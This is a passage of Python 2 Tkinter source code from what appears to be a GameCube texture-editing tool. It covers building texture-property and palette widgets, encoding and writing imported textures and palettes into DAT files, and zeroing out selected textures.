		ttk.Label( flagsFrame, text='Pixel Processing is not used on this texture.', wraplength=wraplength ).grid( column=0, row=0, columnspan=3, pady=(0, vertPadding) )
	# Add widgets for the Render Mode Flags label, hex edit Entry, and Flags 'Decode' button
	ttk.Label( flagsFrame, text='Render Mode Flags:' ).grid( column=0, row=2, sticky='e' )
	hexEntry = HexEditEntry( flagsFrame, matFlagOffsets, 4, 'I', 'Render Mode Flags' )
	hexEntry.grid( column=1, row=2, padx=7, pady=1 )
	Gui.texturePropertiesPane.flagWidgets.append( hexEntry )
	if len( matFlagsData ) == 0: # No Material Structs found; leave the entry empty and read-only
		hexEntry['state'] = 'disabled'
	else:
		hexEntry.insert( 0, next(iter(matFlagsData)).upper() )
		hexEntry.bind( '<Return>', updateEntryHex )
	flagsLabel = ttk.Label( flagsFrame, text='Decode', foreground='#00F', cursor='hand2' )
	flagsLabel.grid( column=2, row=2, pady=0 )
	flagsLabel.bind( '<1>', lambda e, s=matStructs[0], fO=matFlagOffsets: FlagDecoder(s, fO, 1) )
	if len( matFlagsData ) > 1:
		hexEntry['highlightbackground'] = 'orange'
		hexEntry['highlightthickness'] = 2
		displayDifferingDataWarning = True
	# Add widgets for the Texture Flags label, hex edit Entry, and Flags 'Decode' button
	ttk.Label( flagsFrame, text='Texture Flags:' ).grid( column=0, row=3, sticky='e' )
	hexEntry = HexEditEntry( flagsFrame, texFlagFieldOffsets, 4, 'I', 'Texture Flags' )
	hexEntry.grid( column=1, row=3, padx=7, pady=1 )
	Gui.texturePropertiesPane.flagWidgets.append( hexEntry )
	if len( texFlagsData ) == 0:
		hexEntry['state'] = 'disabled'
	else:
		hexEntry.insert( 0, next(iter(texFlagsData)).upper() )
		hexEntry.bind( '<Return>', updateEntryHex )
	flagsLabel = ttk.Label( flagsFrame, text='Decode', foreground='#00F', cursor='hand2' )
	flagsLabel.grid( column=2, row=3 )
	flagsLabel.bind( '<1>', lambda e, s=texStructs[0], fO=texFlagFieldOffsets: FlagDecoder(s, fO, 18) )
	if len( texFlagsData ) > 1:
		hexEntry['highlightbackground'] = 'orange'
		hexEntry['highlightthickness'] = 2
		displayDifferingDataWarning = True
	flagsFrame.pack( pady=(vertPadding*2, 0) )
	# Add Wrap Mode and Repeat Mode
	modesFrame = Tk.Frame( propertiesPane )
	wrapOptions = OrderedDict( [('Clamp', 0), ('Repeat', 1), ('Mirrored', 2), ('Reserved', 3)] )
	# Wrap Mode S
	ttk.Label( modesFrame, text='Wrap Mode S:' ).grid( column=0, row=0, sticky='e' )
	defaultWrapS = int( next(iter(wrapSData)), 16 ) # Gets one of the hex values collected from the struct(s), and then converts it to an int
	if len( wrapSData ) > 1:
		frameBorder = Tk.Frame( modesFrame, background='orange' ) # The optionmenu widget doesn't actually support a border :/
		dropdown = HexEditDropdown( frameBorder, wrapModeSoffsets, 4, 'I', 'Wrap Mode S', wrapOptions, defaultWrapS, command=updateEntryValue )
		dropdown.pack( padx=2, pady=2 )
		frameBorder.grid( column=1, row=0, padx=7, pady=1 )
		displayDifferingDataWarning = True
	else:
		dropdown = HexEditDropdown( modesFrame, wrapModeSoffsets, 4, 'I', 'Wrap Mode S', wrapOptions, defaultWrapS, command=updateEntryValue )
		dropdown.grid( column=1, row=0, padx=7, pady=1 )
	# Wrap Mode T
	ttk.Label( modesFrame, text='Wrap Mode T:' ).grid( column=0, row=1, sticky='e' )
	defaultWrapT = int( next(iter(wrapTData)), 16 ) # Gets one of the hex values collected from the struct(s), and then converts it to an int
	if len( wrapTData ) > 1:
		frameBorder = Tk.Frame( modesFrame, background='orange' ) # The optionmenu widget doesn't actually support a border :/
		dropdown = HexEditDropdown( frameBorder, wrapModeToffsets, 4, 'I', 'Wrap Mode T', wrapOptions, defaultWrapT, command=updateEntryValue )
		dropdown.pack( padx=2, pady=2 )
		frameBorder.grid( column=1, row=1, padx=7, pady=1 )
		displayDifferingDataWarning = True
	else:
		dropdown = HexEditDropdown( modesFrame, wrapModeToffsets, 4, 'I', 'Wrap Mode T', wrapOptions, defaultWrapT, command=updateEntryValue )
		dropdown.grid( column=1, row=1, padx=7, pady=1 )
	# Repeat Mode S
	ttk.Label( modesFrame, text='Repeat Mode S:' ).grid( column=2, row=0, sticky='e', padx=(7, 0) )
	hexEntry = HexEditEntry( modesFrame, reapeatSoffsets, 1, '?', 'Repeat Mode S' )
	hexEntry.insert( 0, next(iter(repeatSData)).upper() )
	hexEntry.bind( '<Return>', updateEntryHex )
	hexEntry.grid( column=3, row=0, padx=7, pady=1 )
	if len( repeatSData ) > 1:
		hexEntry['highlightbackground'] = 'orange'
		hexEntry['highlightthickness'] = 2
		displayDifferingDataWarning = True
	# Repeat Mode T
	ttk.Label( modesFrame, text='Repeat Mode T:' ).grid( column=2, row=1, sticky='e', padx=(7, 0) )
	hexEntry = HexEditEntry( modesFrame, reapeatToffsets, 1, '?', 'Repeat Mode T' )
	hexEntry.insert( 0, next(iter(repeatTData)).upper() )
	hexEntry.bind( '<Return>', updateEntryHex )
	hexEntry.grid( column=3, row=1, padx=7, pady=1 )
	if len( repeatTData ) > 1:
		hexEntry['highlightbackground'] = 'orange'
		hexEntry['highlightthickness'] = 2
		displayDifferingDataWarning = True
	modesFrame.pack( pady=(vertPadding, 0) )
	# Warn the user if any of the above values differed across the structs being edited
	if displayDifferingDataWarning:
		differingDataLabelText = ( 'Warning! Values with an orange border are different across the multiple structures '
								'that these controls will modify; you may want to exercise caution when changing them '
								'here, which would make them all the same.' )
		differingDataLabel = ttk.Label( propertiesPane, text=differingDataLabelText, wraplength=wraplength )
		differingDataLabel.pack( pady=(vertPadding*2, 0) )
	# Add alternative texture sizes (data lengths this texture would occupy if stored in other TPL formats)
	ttk.Separator( propertiesPane, orient='horizontal' ).pack( fill='x', padx=24, pady=(vertPadding*2, 0) )
	ttk.Label( propertiesPane, text='Alternative Texture Sizes:' ).pack( pady=(vertPadding*2, 0) )
	altImageSizesFrame = Tk.Frame( propertiesPane )
	sizesDict = OrderedDict()
	for i, imageType in enumerate( ( 0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 14 ) ): # All valid TPL image format IDs
		thisSize = hsdStructures.ImageDataBlock.getDataLength( width, height, imageType )
		if imageType == thisImageType: continue # Skip the format the texture is already in
		# Group format names that share the same data length
		if not thisSize in sizesDict:
			sizesDict[thisSize] = [userFriendlyFormatList[i]]
		else:
			sizesDict[thisSize].append( userFriendlyFormatList[i] )
	row = 0
	for size, formatList in sizesDict.items():
		ttk.Label( altImageSizesFrame, text=' / '.join( formatList ) ).grid( column=0, row=row, sticky='w' )
		ttk.Label( altImageSizesFrame, text=uHex( size ) ).grid( column=1, row=row, sticky='w', padx=(12, 0) )
		row += 1
	altImageSizesFrame.pack()
class PointerLink( ttk.Label ):

	""" Simple label widget to provide an arrow button, which when clicked, searches for a structure in the SA tab. """

	def __init__( self, parent, structOffset ):
		# Remember which structure this link targets
		self.offset = structOffset

		# Build the label itself; blue text with a hand cursor so it reads as a hyperlink
		ttk.Label.__init__( self, parent, text='-->', foreground='#00F', cursor='hand2' )

		# Left-click jumps to the target structure; a tooltip explains the control
		self.bind( '<1>', self.clicked )
		ToolTip( self, text='Show', delay=500 )

	def clicked( self, _event ):
		# Locate/highlight the target structure, then bring the Structural Analysis tab into view
		showStructInStructuralAnalysis( self.offset )
		Gui.mainTabFrame.select( Gui.savTab )
def determineMaxPaletteColors( imageType, paletteStructLength ):

	""" Determines the maximum number of colors that are supported by a palette. Image type and palette
		data struct length are both considered, going with the lower limit between the two.

			imageType:           TPL image format; must be a paletted type (8, 9, or 10)
			paletteStructLength: byte length of the palette data structure (2 bytes per color entry)

		Returns 0 (and prints an error) if a non-paletted image type is given. """

	if imageType == 8: # 4-bit
		maxColors = 16
	elif imageType == 9: # 8-bit
		maxColors = 256
	elif imageType == 10: # 14-bit
		maxColors = 16384
	else:
		# Parenthesized single-argument form prints identically under Python 2 and 3
		print( 'Invalid image type given to determineMaxPaletteColors(): ' + str(imageType) )
		return 0

	# The actual structure length available overrides the image's type limitation.
	# Explicit floor division: every palette color entry occupies 2 bytes.
	maxColorsBySpace = paletteStructLength // 2

	if maxColorsBySpace < maxColors:
		maxColors = maxColorsBySpace

	return maxColors
def populatePaletteTab( imageDataOffset, imageDataLength, imageType ):
	""" Fills in the Palette tab for the currently selected texture: updates the offset/type/color-count
		labels, and draws each palette color entry onto the palette canvas (8 entries per row, with
		running file-offset indicators every 4 rows). Clicking an entry opens a color picker.

			imageDataOffset: file offset of the texture's image data (relative to the data section)
			imageDataLength: byte length of the image data
			imageType:       TPL image format (expected to be a paletted type: 8, 9, or 10) """
	# If a palette entry was previously highlighted/selected, keep it that way
	previouslySelectedEntryOffset = -1
	selectedEntries = Gui.paletteCanvas.find_withtag( 'selected' )
	if selectedEntries:
		tags = Gui.paletteCanvas.gettags( selectedEntries[0] )
		# Get the other tag, which will be the entry's file offset
		for tag in tags:
			if tag != 'selected':
				previouslySelectedEntryOffset = int( tag.replace('t', '') ) # 't' included in the first place because the tag cannot be purely a number
				break
	Gui.paletteCanvas.delete( 'all' )
	Gui.paletteCanvas.paletteEntries = [] # Storage for the palette square images, so they're not garbage collected. (Using images for their canvas-alpha support.)
	Gui.paletteCanvas.itemColors = {} # For remembering the associated color within the images (rather than looking up pixel data within the image) and other info, to be passed on to the color picker
	# Try to get info on the texture's palette
	paletteDataOffset, paletteHeaderOffset, paletteLength, paletteType, colorCount = getPaletteInfo( globalDatFile, imageDataOffset )
	if paletteDataOffset == -1: # Couldn't find the data. Set all values to 'not available (n/a)'
		Gui.paletteDataText.set( 'Data Offset:\nN/A' )
		Gui.paletteHeaderText.set( 'Header Offset:\nN/A' )
		Gui.paletteTypeText.set( 'Palette Type:\nN/A' )
		Gui.paletteMaxColorsText.set( 'Max Colors:\nN/A' )
		Gui.paletteStatedColorsText.set( 'Stated Colors:\nN/A' )
		#Gui.paletteActualColorsText.set( 'Actual Colors:\nN/A' )
		return
	# Get the image and palette data. Note that paletteData is a HEX STRING, so each
	# 2-byte color entry occupies 4 characters of it.
	imageData = globalDatFile.getData( imageDataOffset, imageDataLength )
	paletteData = hexlify( getPaletteData(globalDatFile, paletteDataOffset=paletteDataOffset, imageData=imageData, imageType=imageType)[0] )
	# Update all fields and the palette canvas (to display the color entries).
	# The + 0x20 converts data-section-relative offsets to absolute file offsets (DAT header size).
	Gui.paletteDataText.set( 'Data Offset:\n' + uHex(paletteDataOffset + 0x20) )
	if paletteHeaderOffset == -1: Gui.paletteHeaderText.set( 'Header Offset:\nNone' )
	else: Gui.paletteHeaderText.set( 'Header Offset:\n' + uHex(paletteHeaderOffset + 0x20) )
	if paletteType == 0: Gui.paletteTypeText.set( 'Palette Type:\n0 (IA8)' )
	if paletteType == 1: Gui.paletteTypeText.set( 'Palette Type:\n1 (RGB565)' )
	if paletteType == 2: Gui.paletteTypeText.set( 'Palette Type:\n2 (RGB5A3)' )
	Gui.paletteMaxColorsText.set( 'Max Colors:\n' + str(determineMaxPaletteColors( imageType, paletteLength )) )
	Gui.paletteStatedColorsText.set( 'Stated Colors:\n' + str(colorCount) )
	#Gui.paletteActualColorsText.set( 'Actual Colors:\n' + str(len(paletteData)/4) )
	# Create the initial/top offset indicator.
	x = 7
	y = 11
	Gui.paletteCanvas.create_line( 105, y-3, 120, y-3, 130, y+4, 175, y+4, tags='descriptors' ) # x1, y1, x2, y2, etc....
	Gui.paletteCanvas.create_text( 154, y + 12, text=uHex(paletteDataOffset + 0x20), tags='descriptors' )
	# Populate the canvas with the palette entries.
	for i in xrange( 0, len(paletteData), 4 ): # For each palette entry (4 hex chars = 2 bytes)....
		paletteEntry = paletteData[i:i+4]
		entryNum = i/4 # Zero-based index of this color entry
		paletteEntryOffset = paletteDataOffset + i/2 # Hex-char index halved gives the byte offset
		x = x + 12
		rgbaColor = tplDecoder.decodeColor( paletteType, paletteEntry, decodeForPalette=True ) # rgbaColor = ( r, g, b, a )
		# Prepare and store an image object for the entry (since .create_rectangle doesn't support transparency)
		paletteSwatch = Image.new( 'RGBA', (8, 8), rgbaColor )
		Gui.paletteCanvas.paletteEntries.append( ImageTk.PhotoImage(paletteSwatch) )
		# Draw a rectangle for a border; start by checking whether this is a currently selected entry
		if paletteEntryOffset == previouslySelectedEntryOffset:
			borderColor = Gui.paletteCanvas.entryBorderColor
			tags = ('selected', 't'+str(paletteEntryOffset) )
		else:
			borderColor = 'black'
			tags = 't'+str(paletteEntryOffset)
		Gui.paletteCanvas.create_line( x-1, y-1, x+8, y-1, x+8, y+8, x-1, y+8, x-1, y-1, fill=borderColor, tags=tags )
		# Draw the image onto the canvas.
		itemId = Gui.paletteCanvas.create_image( x, y, image=Gui.paletteCanvas.paletteEntries[entryNum], anchor='nw', tags='entries' )
		Gui.paletteCanvas.itemColors[itemId] = ( rgbaColor, paletteEntry, paletteEntryOffset, imageDataOffset )
		if x >= 103: # End of the row (of 8 entries); start a new row.
			x = 7
			y = y + 11
			# Reassign i to a 1-based entry count for the checks below. This does NOT affect
			# the loop iteration; xrange supplies the next value of i regardless.
			i = i / 4 + 1
			# Check if the current palette entry is a multiple of 32 (4 lines)
			if float( i/float(32) ).is_integer() and i < len( paletteData )/4: # (second check prevents execution after last chunk of 0x40)
				# Add a gap and another running file-offset indicator for the next group of rows
				y = y + 6
				Gui.paletteCanvas.create_line( 105, y-3, 117, y-3, 130, y+4, 176, y+4, tags='descriptors' ) # x1, y1, x2, y2, etc....
				Gui.paletteCanvas.create_text( 154, y + 12, text=uHex(paletteDataOffset + 0x20 + i*2), tags='descriptors' )
	def onColorClick( event ):
		# Determine which canvas item was clicked on, and use that to look up all entry info
		itemId = event.widget.find_closest( event.x, event.y )[0]
		if itemId not in Gui.paletteCanvas.itemColors: return # Abort. Probably clicked on a border.
		canvasItemInfo = Gui.paletteCanvas.itemColors[itemId]
		initialHexColor = ''.join( [ "{0:0{1}X}".format( channel, 2 ) for channel in canvasItemInfo[0] ] )
		MeleeColorPicker( 'Change Palette Color', initialHexColor, paletteType, windowId=itemId, datDataOffsets=canvasItemInfo )
	def onMouseEnter(e): Gui.paletteCanvas['cursor']='hand2'
	def onMouseLeave(e): Gui.paletteCanvas['cursor']=''
	Gui.paletteCanvas.tag_bind( 'entries', '<1>', onColorClick )
	Gui.paletteCanvas.tag_bind( 'entries', '<Enter>', onMouseEnter )
	Gui.paletteCanvas.tag_bind( 'entries', '<Leave>', onMouseLeave )
def writeTextureToDat( datFile, imageFilepath, imageDataOffset, updateGui, subsequentMipmapPass=False ):
	""" Collects information on the image being imported, encodes it as raw TPL data, and writes it into the DAT's file data.
		Returns a 3-tuple: the success/fail status of the operation, and two extra info strings (used for
		palette/property details when an import fails; empty strings otherwise).
		"status" may be one of the following strings:
			dataObtained			operation (image encoding and import) successful
			paletteRegenerated		[for paletted textures] operation successful, and a new palette was generated
			dataWithAdHocPalette	deprecated; shouldn't be possible anymore. same as above, except the encoding and palette generation was done by wimgt
			formatUnsupported		unable to encode/import, likely because the image was not a PNG or TPL file
			imageHeaderNotFound		couldn't find headers for image data located at imageDataOffset. the offset is likely wrong, or the header was modified
			invalidMipmapDims
			imageTypeNotFound
			notEnoughSpace
		or an exit code (of failed conversion) """
	# Collect info on this image
	newImagePath = imageFilepath # Temp filepath for mipmap textures; subsequent mipmap levels will be downsized from the original image file
	iid = str( imageDataOffset ) # For the datTextureTree treeview, an iid is the image data offset.
	updateDataHeaders = generalBoolSettings['autoUpdateHeaders'].get()
	headersAvailable = True # Set False below for file types that store image data without image data headers
	datIsEffectsFile = isEffectsFile( datFile )
	# NOTE(review): reads globalDatFile here rather than the datFile parameter — verify this is intentional
	lastEffTextureOffset = getattr( globalDatFile, 'lastEffTexture', -1 ) # Only relevant with effects files
	# Treat this as a DOL file if this is for special alphabet character textures in SdMenu.dat/.usd (these have no headers)
	if datFile.rootNodes != [] and datFile.rootNodes[0] == (0, 'SIS_MenuData'):
		targetFileExt = 'dol'
	else:
		targetFileExt = datFile.path.split( '.' )[-1].lower()
	mipmapLevel = getMipmapLevel( iid ) # -1 if this texture is not part of a mipmap chain
	# The branches below establish origWidth/origHeight/origImageType/origImageDataLength for the
	# texture currently in the file, depending on the kind of file it lives in.
	if targetFileExt == 'dol': # Special processing for DOLs, since they have no image data headers.
		origWidth = 32; origHeight = 32; origImageType = 0
		origImageDataLength = 0x200
		headersAvailable = False
	elif targetFileExt == 'bnr': # Special processing for Banners, since they have no image data headers.
		origWidth = 96; origHeight = 32; origImageType = 5
		origImageDataLength = 0x1800
		headersAvailable = False
	elif mipmapLevel > -1: # Special processing for mipmap images
		imageDataOffset, origImageDataLength, origWidth, origHeight, origImageType = parseTextureDetails( iid )
		# Create a temp file name and save location.
		sourceDatFilename = os.path.basename( datFile.path ).split('_')[-1]
		newFileName = sourceDatFilename + '_' + uHex(imageDataOffset + 0x20) + '_' + str(origImageType)
		# Get the Game ID if this file was loaded from a disc.
		if datFile.source == 'disc' and globalDiscDetails['gameId'] != '': # Means an ISO has been loaded, and (using the file path) the current dat is not from an outside standalone file.
			gameID = globalDiscDetails['gameId']
		else: gameID = 'No Associated Disc'
		# Construct the destination file path, and create the folders if they don't already exist.
		destinationFolder = texDumpsFolder + '\\' + gameID + '\\' + sourceDatFilename + '\\'
		if not os.path.exists(destinationFolder): os.makedirs(destinationFolder)
		# If the imported file is in TPL format, convert it to PNG
		if imageFilepath[-4:] == '.tpl':
			newImage = tplDecoder( imageFilepath, (origWidth, origHeight), origImageType )
			imageFilepath = destinationFolder + newFileName + '.tpl'
			newImage.createPngFile( imageFilepath, creator='DTW - v' + programVersion )
		# Open the image that will be used as a base for all mipmap levels
		mipmapImage = Image.open( imageFilepath )
		# Validate the image's dimensions, and resize it if needed
		if mipmapImage.size != (origWidth, origHeight):
			# Dimension mismatch is only allowed on recursive passes (cascading down the mipmap chain)
			if not subsequentMipmapPass: return ( 'invalidMipmapDims', '', '' )
			else:
				# Downscale the original texture to the current mipmap level's size.
				filters = { 'nearest': 0, 'lanczos': 1, 'bilinear': 2, 'bicubic': 3 }
				filterId = filters[settings.get( 'General Settings', 'downscalingFilter' )]
				mipmapImage = mipmapImage.resize( (origWidth, origHeight), resample=filterId )
				# Save the image data to a memory buffer so it can be sent to the encoder without creating a file (needed for wimgt).
				#imageBuffer = StringIO()
				#mipmapImage.save( imageBuffer, 'png' )
				#newImagePath = imageBuffer.getvalue()
				#newImagePath = imageBuffer
				# Save the image data to a new file (#todo: once wimgt is no longer needed, use above method to prevent needing to create a file)
				newImagePath = destinationFolder + newFileName + '.png'
				mipmapImage.save( newImagePath, 'png' )
	elif (0x1E00, 'MemSnapIconData') in datFile.rootNodes: # The file is LbMcSnap.usd or LbMcSnap.dat (Memory card banner/icon file from SSB Melee)
		headersAvailable = False
		if imageDataOffset == 0: # First image in the file is the banner
			origWidth = 96; origHeight = 32
			origImageType = 5
			origImageDataLength = 0x1800
		else: # There are only two images in this file
			origWidth = 32; origHeight = 32
			origImageType = 9
			origImageDataLength = 0x400
	elif (0x4E00, 'MemCardIconData') in datFile.rootNodes: # The file is LbMcGame.usd or LbMcGame.dat (Memory card banner/icon file from SSB Melee)
		headersAvailable = False
		if imageDataOffset < 0x4800: # Banner images come first in this file
			origWidth = 96; origHeight = 32
			origImageType = 5
			origImageDataLength = 0x1800
		else:
			origWidth = 32; origHeight = 32
			origImageType = 9
			origImageDataLength = 0x400
	elif datIsEffectsFile and imageDataOffset <= lastEffTextureOffset:
		headersAvailable = False # Some image data headers are shared in this file, so they can't be changed (unless all are changed)
		_, origImageDataLength, origWidth, origHeight, origImageType = parseTextureDetails( iid ) # todo: fix this; it won't work with disc import method
	else: # The usual case: a standard DAT with image data headers
		# Validate the given image data offset
		if imageDataOffset not in datFile.structureOffsets:
			msg( 'Invalid Texture offset detected: ' + hex(0x20+imageDataOffset) + '; unable to write texture into DAT.' )
			return ( 'invalidTextureOffset', '', '' ) # todo; this is not yet specifically handled in the texture import function
		# Gather info on the texture currently in the DAT/USD.
		imageDataStruct = datFile.initDataBlock( hsdStructures.ImageDataBlock, imageDataOffset )
		_, origWidth, origHeight, origImageType, _, _, _ = imageDataStruct.getAttributes()
		origImageDataLength = getImageDataLength( origWidth, origHeight, origImageType )
	# Gather palette information on the texture currently in the DAT.
	if origImageType == 8 or origImageType == 9 or origImageType == 10: # Paletted image types
		# Find information on the associated palette (if unable to, return).
		paletteDataOffset, paletteHeaderOffset, paletteLength, origPaletteType, origPaletteColorCount = getPaletteInfo( datFile, imageDataOffset )
		if paletteDataOffset == -1: return ( 'paletteNotFound', '', '' )
		# If not updating data headers, assume the current palette format must be preserved, and prevent the tplCodec from choosing one (if it creates a palette)
		# In other words, if there are data headers, leave this unspecified so that the codec may intelligently choose the best palette type.
		if updateDataHeaders and headersAvailable:
			origPaletteType = None # No known value description for palette type in effects files
			maxPaletteColorCount = paletteLength / 2 # 2 bytes per color entry
	else: # Non-paletted image; use defaults so the encoder is unconstrained
		origPaletteType = None
		origPaletteColorCount = 255
		maxPaletteColorCount = 255
	# Encode the image data into TPL format
	try:
		newImage = tplEncoder( newImagePath, imageType=origImageType, paletteType=origPaletteType, maxPaletteColors=maxPaletteColorCount )
		newImageData = newImage.encodedImageData
		newPaletteData = newImage.encodedPaletteData
		newImageType = newImage.imageType
		# Image data header format: 2-byte width, 2-byte height, 4-byte image type (hex string here)
		newImageHeader = "{0:0{1}X}".format( newImage.width, 4 ) + "{0:0{1}X}".format( newImage.height, 4 ) + "{0:0{1}X}".format(newImageType, 8)
		status = 'dataObtained'
	except TypeError: # For CMPR (_14) textures.
		(status, newImageHeader, newImageData, _, newPaletteData) = getImageFileAsTPL( newImagePath, origImageType )
		newImageData = bytearray.fromhex( newImageData )
		newPaletteData = bytearray.fromhex( newPaletteData )
		newImageType = int( newImageHeader[-2:], 16 )
		# If this codec is attempted, none of the exceptions below will be triggered; status will come from getImageFileAsTPL above.
	except IOError:
		status = 'formatUnsupported'
	except missingType:
		status = 'imageTypeNotFound'
	except Exception as error:
		print 'Encoding fail error:', error
		status = 'failedEncoding'
	#if mipmapData: imageBuffer.close()
	# Validate banner dimensions before importing it to the DAT file
	# NOTE(review): newImage may be unbound here if encoding took the CMPR/exception paths above — verify
	if targetFileExt == 'bnr' and ( newImage.width != 96 or newImage.height != 32):
		return ( 'invalidDimensions', '', '' )
	# Texture info collected and texture data encoded.
	if status != 'dataObtained' and status != 'dataWithAdHocPalette':
		return ( status, '', '' )
	else:
		newImageDataLength = len( newImageData )
	# Image properly imported to program's memory. Check that it will fit in the alloted space and whether a palette also needs to be replaced.
	if newImageDataLength > origImageDataLength: return ( 'notEnoughSpace', '', '' )
	else:
		# If this is not a DOL file, then add 0x20 bytes to account for a DAT's file header.
		adjustedImageDataOffset = imageDataOffset
		if not targetFileExt == 'dol': adjustedImageDataOffset += 0x20
		if newImageType == 8 or newImageType == 9 or newImageType == 10: # Paletted; the palette must be written too
			# Check if a new palette was generated, and whether it's currently permitted to use a new one
			if newImage.paletteRegenerated and not generalBoolSettings['regenInvalidPalettes'].get():
				unpermittedPaletteRegen = True
			else: unpermittedPaletteRegen = False
			# Make sure there is space for the new palette, and update the dat's data with it.
			newPaletteColorCount = len( newPaletteData ) / 2 # All of the palette types (IA8, RGB565, and RGB5A3) are 2 bytes per color entry
			if newPaletteColorCount <= maxPaletteColorCount and not unpermittedPaletteRegen:
				entriesToFill = origPaletteColorCount - newPaletteColorCount
				nullData = '8000' * entriesToFill # 8000 typically seen as null entry data for palettes
				nullBytes = bytearray.fromhex( nullData )
				# Update the palette data header (if there is one)
				if origPaletteType != newImage.paletteType:
					if not headersAvailable:
						return ( 'invalidPaletteProperties', origPaletteType, newImage.paletteType )
					elif updateDataHeaders:
						descriptionOfChange = 'Palette type updated in header'
						datFile.updateData( paletteHeaderOffset+7, newImage.paletteType, descriptionOfChange ) # sets the palette type
					else:
						msg('Warning: The texture imported to ' + uHex( adjustedImageDataOffset ) + ' has a different palette type than the current '
							'one, and automatic updating of data headers is disabled. This could lead '
							"to undesired effects or crashes.\n\nIf you know what you're doing, so be it. If not, you can re-enable Auto-Update Headers "
							"in the Settings menu and re-import this texture to solve this, or manually edit the header(s) in the Structural Analysis tab.",
							'Different Palette Type Detected')
				# Update the palette data
				datFile.updateData( paletteDataOffset, newPaletteData + nullBytes, 'Palette data updated' )
				if newImage.paletteRegenerated: status = 'paletteRegenerated'
			else:
				return ( 'paletteTooLarge', str(maxPaletteColorCount), str(newImage.originalPaletteColorCount) )
		# Look at the image data headers to see whether the current ones should be updated.
		currentHeader = "{0:0{1}X}".format(origWidth, 4) + "{0:0{1}X}".format(origHeight, 4) + "{0:0{1}X}".format(origImageType, 8) # 8 bytes total
		if currentHeader.lower() != newImageHeader.lower():
			if not headersAvailable:
				return ( 'invalidImageProperties', (origWidth, origHeight), origImageType )
			# If the auto-update is enabled, update each image data header to match the new texture's properties. Otherwise, warn the user of the difference.
			elif updateDataHeaders:
				headerOffsets = datFile.structs[imageDataOffset].getParents()
				for offset in headerOffsets:
					datFile.updateData( offset+4, bytearray.fromhex(newImageHeader), 'Image type updated in header' )
			else:
				msg('Warning: The texture imported to ' + uHex( adjustedImageDataOffset ) + ' has different properties than the current '
					'one (width, height, or texture type), and automatic updating of data headers is disabled. This could lead '
					"to undesired effects or crashes.\n\nIf you know what you're doing, so be it. If not, you can re-enable Auto-Update Headers "
					"in the Settings menu and re-import this texture to solve this, or manually edit the header(s) in the Structural Analysis tab.",
					'Different Image Data Properties Detected')
		# If the new texture is smaller than the original, fill the extra space with zeroes
		if newImageDataLength < origImageDataLength:
			newImageData.extend( bytearray(origImageDataLength - newImageDataLength) ) # Adds n bytes of null data
		# Update the texture image data in the file
		datFile.updateData( imageDataOffset, newImageData, 'Image data updated' )
		# Check for potentially invalid image dimensions
		# Parse the newImageHeader for the new dimensions (can't use newImage.width because a newImage might not have been created)
		width = int( newImageHeader[:4], 16 )
		height = int( newImageHeader[4:8], 16 )
		# if width > 1024 or width % 2 != 0 or height > 1024 or height % 2 != 0:
		# 	status = 'invalidDimensions'
		# 	tags = list( Gui.datTextureTree.item( iid, 'tags' ) )
		# 	if 'warn' not in tags:
		# 		tags.append( 'warn' )
		# 		Gui.datTextureTree.item( iid, tags=tags )
		if updateGui: # Update the image displayed in the GUI on the DAT Texture Tree tab
			renderTextureData( imageDataOffset, width, height, newImageType, newImageDataLength, allowImageDumping=False )
			# Update the GUI/treeview's values for the texture.
			newValues = (
					uHex(adjustedImageDataOffset) + '\n(' + uHex(newImageDataLength) + ')', # offset to image data, and data length
					( str(width) + ' x ' + str(height) ), # width and height
					'_' + str(newImageType) + ' (' + imageFormats[newImageType] + ')' # the image type and format
				)
			Gui.datTextureTree.item( iid, values=newValues )
		# Replace child mipmap textures if there are any (recurses down the chain, each level
		# immediately following the previous level's data, until a 1 px dimension is reached)
		if mipmapLevel > -1 and generalBoolSettings['cascadeMipmapChanges'].get() and ( width > 1 and height > 1 ):
			Gui.root.update() # Updates the GUI, so that the above texture replacement can be seen before moving on to the next texture
			status = writeTextureToDat( datFile, imageFilepath, imageDataOffset + origImageDataLength, updateGui, True )[0]
		return ( status, '', '' )
def blankTextures( cascadingMipmapChange=False, iidSelectionsTuple=() ):
    """ Zeroes-out the image data (and palette data, if present) for the given textures in the
        DAT Texture Tree, then re-renders them so the change is visible in the GUI. If the
        'cascadeMipmapChanges' setting is enabled, the blanking is recursively applied to each
        texture's subsequent (smaller) mipmap levels as well.

            cascadingMipmapChange:  True when this is a recursive call for a lower mipmap level
                                    (suppresses the final program-status update)
            iidSelectionsTuple:     treeview item ids to operate on; defaults to the current selection """
    if not iidSelectionsTuple: iidSelectionsTuple = Gui.datTextureTree.selection()
    if len( iidSelectionsTuple ) == 0: msg( 'No textures are selected.' )
    else:
        for iid in iidSelectionsTuple:
            # Collect info on the selected texture.
            imageDataOffset, imageDataLength, width, height, imageType = parseTextureDetails( iid )
            # Fill the texture data area with zeros.
            emptyBytes = bytearray( imageDataLength ) # bytearray initialized with n bytes of 0
            globalDatFile.updateData( imageDataOffset, emptyBytes, 'Texture zeroed out' )
            # If it's a paletted image, fill the palette data region with zeros as well.
            # (Types 8/9/10 are the CI4/CI8/CI14x2 indexed formats, which carry a palette.)
            if imageType == 8 or imageType == 9 or imageType == 10:
                paletteDataOffset, paletteHeaderOffset, paletteLength, paletteType, paletteColorCount = getPaletteInfo( globalDatFile, imageDataOffset )
                if paletteDataOffset == -1: continue # No palette found for this texture
                # '8000' is two bytes, so the palette length variable is halved (Python 2 integer division)
                emptyPaletteData = '8000' * ( paletteLength / 2 )
                globalDatFile.updateData( paletteDataOffset, bytearray.fromhex(emptyPaletteData), 'Palette zeroed out' )
                # Update the palette tab if this is the currently selected texture.
                if iid == Gui.datTextureTree.selection()[-1]: populatePaletteTab( int(iid), imageDataLength, imageType )
            # Load the texture and a thumbnail image of it into memory
            renderTextureData( imageDataOffset, width, height, imageType, imageDataLength, allowImageDumping=False )
            # Remember this change (per initially selected texture(s), but not for lower cascaded mipmap levels)
            # if not cascadingMipmapChange:
            #   # If this is not a DOL file, then add 0x20 bytes to account for a DAT's file header.
            #   filename = os.path.basename( globalDatFile.path )
            #   adjustedImageDataOffset = imageDataOffset
            #   if not filename[-4:].lower() == '.dol': adjustedImageDataOffset += 0x20
            #   globalDatFile.unsavedChanges.append( 'Texture erased at ' + uHex(adjustedImageDataOffset) + ' in ' + filename + '.' )
            # Update subsequent mipmap levels by recursing on the next level's treeview item
            if generalBoolSettings['cascadeMipmapChanges'].get() and 'mipmap' in Gui.datTextureTree.item( iid, 'tags' ):
                # Check if this is the 'parent' mipmap
                if Gui.datTextureTree.parent( iid ) == '': # root item; get iid of first child
